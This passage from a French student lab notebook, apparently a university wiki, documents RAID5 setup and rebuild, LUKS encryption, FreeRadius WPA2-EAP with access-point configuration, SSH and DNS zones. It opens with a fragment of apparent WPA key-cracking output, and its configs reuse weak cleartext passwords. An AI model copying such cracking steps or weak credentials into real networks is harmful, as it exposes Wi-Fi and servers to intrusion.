      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Réalisations ===&lt;br /&gt;
==== Sécurisation des données ====&lt;br /&gt;
&lt;br /&gt;
Nous créons d'abord 3 nouvelles partitions, que nous associons à notre VM en modifiant le fichier GreenArrow.cfg :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-1 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-2 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-3 -v&lt;br /&gt;
&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-1,xvdd,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-2,xvde,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-3,xvdf,w',&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite installer mdadm :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install mdadm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avions une erreur à propos du subsystem. Pour que cela fonctionne, il nous manquait la commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install linux-image-3.16.0-4-amd64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de la machine, nous créons le volume /dev/md0:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous sauvons cette dernière afin de conserver md0:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mkfs /dev/md0&lt;br /&gt;
root@GreenArrow:~# mkdir /datamd0&lt;br /&gt;
root@GreenArrow:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être surs que la partition soit encore montée après le reboot:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/md0 /datamd0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# vim testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous mettons en commentaire la 2ème partition dans le fichier de conf, puis redémarrons la machine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 13:20:27 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 4&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       2       0        0        2      removed&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# ls /datamd0/&lt;br /&gt;
testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours:&lt;br /&gt;
Suppression de la partition xvdf:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La partition est bien supprimée:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remet la partition:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --add /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On peut ensuite constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===&amp;gt;.................]  recovery = 18.2% (191112/1047552) finish=0.4min speed=31852K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 20.0% (210764/1047552) finish=0.4min speed=30109K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 21.8% (229836/1047552) finish=0.4min speed=32833K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.6% (626140/1047552) finish=0.2min speed=29816K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.3% (989688/1047552) finish=0.0min speed=30124K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# [  446.720069] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous vérifions grâce à Gparted que la carte SD fournie comporte une seule partition.&lt;br /&gt;
Une fois ce test passé, nous regardons grâce à dmesg où est localisé la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# dmesg&lt;br /&gt;
[...]&lt;br /&gt;
[1126726.403767] mmcblk1: mmc1:59b4 NCard 14.7 GiB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre carte SD se situe donc sur /dev/mmcblk1.&lt;br /&gt;
Nous faisons donc un chiffrage AES avec un hashage SHA256 de la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons alors renseigner un mot de passe pour crypter la clef.&lt;br /&gt;
Ensuite, nous ouvrons la partition Luks, puis nous formatons la carte :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous montons la partition, puis créons un fichier sur la carte :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons la carte SD et fermons la partition Luks :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous essayons ensuite d'accéder à la carte SD. En renseignant un mauvais mot de passe, une erreur apparaît.&lt;br /&gt;
Cependant, une fois le bon mot de passe renseigné, tout re-devient possible.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;br /&gt;
Tout d'abord, nous installons FreeRadius sur notre machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous renseignons le login et le mot de passe pour se connecter à la borne Wifi : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
GreenArrow Cleartext-Password:=&amp;quot;glopglop&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne E306 et E304 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
client E304 {&lt;br /&gt;
	ipaddr		= 10.60.1.4&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''', puis nous rentrons en mode configuration : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aaa authentication login eap_greenarrow group radius_greenarrow&lt;br /&gt;
radius-server host 193.48.57.162 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
aaa group server radius radius_greenarrow&lt;br /&gt;
server 193.48.57.162 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_GREENARROW&lt;br /&gt;
vlan 3&lt;br /&gt;
authentication open eap eap_greenarrow&lt;br /&gt;
authentication network-eap eap_greenarrow&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 3 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_GREENARROW&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 3&lt;br /&gt;
bridge-group 3 subscriber-loop-control&lt;br /&gt;
bridge-group 3 spanning-disabled&lt;br /&gt;
bridge-group 3 block-unknown-source&lt;br /&gt;
no bridge-group 3 source-learning&lt;br /&gt;
no bridge-group 3 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
bridge-group 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois ces modifications effectuées, nous configurons l'interface wlan0 de l'eeePC pour pouvoir se connecter au Wifi à l'aide de '''ifup wlan0''' : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.3.2&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.3.1&lt;br /&gt;
  wpa-ssid SSID_GREENARROW&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity GreenArrow&lt;br /&gt;
  wpa-password glopglop&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance le serveur FreeRadius via freeradius -X (mode debug).&lt;br /&gt;
Sur smartphone, nous arrivons à détecter notre SSID (SSID_GREENARROW). Nous pouvons également ping notre eeePC depuis la machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/freeradius# ping 10.60.3.2&lt;br /&gt;
PING 10.60.3.2 (10.60.3.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=1 ttl=255 time=1.30 ms&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=2 ttl=255 time=1.96 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Configuration d'un PCBX ====&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35894</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35894"/>
				<updated>2016-12-12T10:01:30Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Sécurisation Wifi par WPA2-EAP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=GreenArrow --ip=193.48.57.162 --netmask=255.255.255.240 --gateway=193.48.57.172&lt;br /&gt;
  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Modification du fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-home -v&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-var -v&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-home,xvdc,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-var,xvdb,w',&lt;br /&gt;
              ]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
